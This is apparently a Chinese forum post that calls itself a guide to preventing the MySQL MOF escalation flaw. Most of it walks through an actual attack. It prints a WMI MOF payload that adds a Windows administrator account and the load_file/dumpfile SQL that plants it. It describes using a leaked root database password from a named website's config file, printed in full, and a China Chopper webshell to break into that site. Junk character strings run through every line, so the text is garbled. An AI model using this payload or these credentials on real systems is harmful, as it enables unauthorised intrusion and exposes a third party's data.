Mysql mof扩展漏洞防范方法
4 K5 ~& K# ]% W) o9 [2 u4 o
& y, n- i9 _7 E: R" @2 t, s网上公开的一些利用代码:3 H0 W( G# L0 w h5 H2 Q9 ^
0 Q# w; k+ D- j( e) T6 g4 P9 q# m
#pragma namespace(“\\\\.\\root\\subscription”)
0 j6 K% G- p2 B0 p A# u5 H5 S
. o" R, F+ U& s0 Uinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
8 f6 Y6 I% C; n7 F: }1 |; H# ~; V' r3 w. q/ k" W% q7 X
$ N; n4 H; e/ q: s6 g( [. j9 Q, _$ U( j( n
9 _3 @: @& [6 `. M/ C) T
% Q5 B( W: M8 y4 V; C: G2 {( [
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
6 c; x3 K) _9 w) j, B! v从上面代码来看得出解决办法:
; @8 p* i4 s2 N/ n4 ~0 @2 a- T
1 V$ B& Y- y( u% w9 h: d/ a1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
4 b5 U3 ~" h3 ?8 l3 a- K0 L* c& v2 @* q! {
2、禁止使用”WScript.Shel”组件) k- B9 `8 N/ m2 ^
, N: l6 Z+ }$ |. X- k, f3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER, R3 D3 t$ }% U
' ]6 E- [% C; N当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下. B1 E j! G! W
2 }* a: I8 _" S6 F+ p+ k
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权; C5 {* K" ?7 X6 h1 v
, g& ]5 J; t" s' |9 t7 ]" G
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容# }7 m- j9 Q5 s3 M( v
& w$ } U' m" N& O Z+ [3 V看懂了后就开始练手吧; [/ M6 [! [# m3 X& B( m, s; c6 _
6 ~* g, J! q, { f' ~8 K& E0 `
http://www.webbmw.com/config/config_ucenter.php 一句话 a' g3 t! L/ P1 b% [, t0 A. F' @
% K" x2 B6 s, [: u" U V
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
- v1 k# I% ^* U$ U4 v+ ]4 |
/ q+ L8 I" A) e+ g9 Y于是直接用菜刀开搞
" Y- G: {1 D7 m. \8 Y7 m- @. O! [9 M
上马先
, g' O( y' ^+ s& N: ~/ f# k2 Q$ G! ]1 P! V5 g
既然有了那些账号 之类的 于是我们就执行吧…….
6 Y, Y% a+ o* K3 W6 J% O& _, ?8 W7 i. P4 h/ m* Y$ G
小小的说下
, _2 M& Q4 }* X; o8 b4 K. r
1 K- Y* v# |! G, J8 D0 R6 i. ^在这里第1次执行未成功 原因未知$ {; @: E- {4 O' ?/ b+ M
/ S) n/ T4 B c* U% ]5 B- k6 j) ~
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。% R) F1 w: b- J' w# Y
7 N/ l" U% P- q" o6 O6 q5 g#pragma namespace(“\\\\.\\root\\subscription”)
# o$ }" q: ?5 f; D; r A6 x, \+ F/ S# P1 F4 f5 K6 ?
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };- i4 m; M. g* a0 h$ {9 U
/ w) }0 B; s8 {5 [( s我是将文件放到C:\WINDOWS\temp\1.mof
# p: S6 O: I+ B3 s! t0 |3 Q1 J; o0 H8 g
所以我们就改下执行的代码
7 u) s9 ^3 Z7 I9 d& x
$ T3 N# O3 V8 f, }0 L# Lselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
1 o5 c9 S$ } m1 H- \
" B" m" _: _3 z7 y w, P2 `1 ^5 f2 T, p0 o
7 O9 u! ]1 F& J8 Z3 O* P* B
但是 你会发现账号还是没有躺在那里。。' @& S& ]# ]$ v# H8 A! u0 s
5 y/ W" k3 D0 c* V$ M, j1 s
于是我就感觉蛋疼
' l# A* H3 m* `* S9 B" b- a0 S5 J6 j n: W6 [% R4 Q& E
就去一个一个去执行 但是执行到第2个 mysql时就成功了………6 w0 Q( p4 W& L# s/ @
2 l( D' {. g% B& W# s# }* [/ D
, h/ F! \% M" H& E. v( e6 W0 d; {4 X
但是其他库均不成功…
! G# m& n8 l' B( j1 T( @0 v( Q" g# w0 M! H3 f" ^
我就很费解呀 到底为什么不成功求大牛解答…2 U: R7 U' c2 f8 M
2 v' G2 Z6 x. h4 m& f+ w
% n/ T/ f6 A, |1 M- K
. M2 W2 n" i6 ^5 G |